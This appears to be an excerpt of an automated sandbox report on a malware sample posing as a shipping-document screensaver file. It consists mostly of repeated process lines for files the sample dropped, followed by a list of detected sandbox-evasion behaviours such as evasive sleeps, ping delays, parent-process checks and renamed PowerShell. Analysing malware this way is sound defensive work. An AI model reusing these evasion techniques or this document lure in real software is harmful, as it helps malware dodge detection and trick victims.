Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794F7A7 Sleep,ExitProcess,

0_2_2794F7A7

Powershell is started from unusual location (likely to bypass HIPS)

Source: c:\users\public\xkn.exe

Key value queried: Powershell behavior

Jump to behavior

Uses ping.exe to sleep

Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\Public\xkn.exe	Memory allocated: 1F43A9C0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\Public\xkn.exe	Memory allocated: 1F43AA10000 memory reserve \| memory write watch			Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

36_2_0040DD85

Contains functionality to enumerate running services

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

0_2_2795A748

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\xkn.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Window / User API: threadDelayed 9744	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 1646	Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 1786	Jump to behavior

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 6.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Windows \System32\per.exe	API coverage: 7.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 7.9 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.5 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.8 %
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	API coverage: 10.0 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900	Thread sleep time: -714000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe TID: 7900	Thread sleep time: -29232000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif TID: 7348	Thread sleep count: 241 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7712	Thread sleep count: 1646 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7712	Thread sleep count: 1786 > 30	Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7736	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_401010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_401010F1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27949665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_27949665
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	0_2_2794BD37
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	0_2_2794BB30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	0_2_2794C34D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2795C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	0_2_2795C291
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27959AF5 FindFirstFileW,	0_2_27959AF5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794880C FindFirstFileW,FindNextFileW,FindClose,	0_2_2794880C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2794783C FindFirstFileW,FindNextFileW,	0_2_2794783C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF70CC82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF70CC735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF70CC71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF70CC8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF70CC97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF70CC97B4C
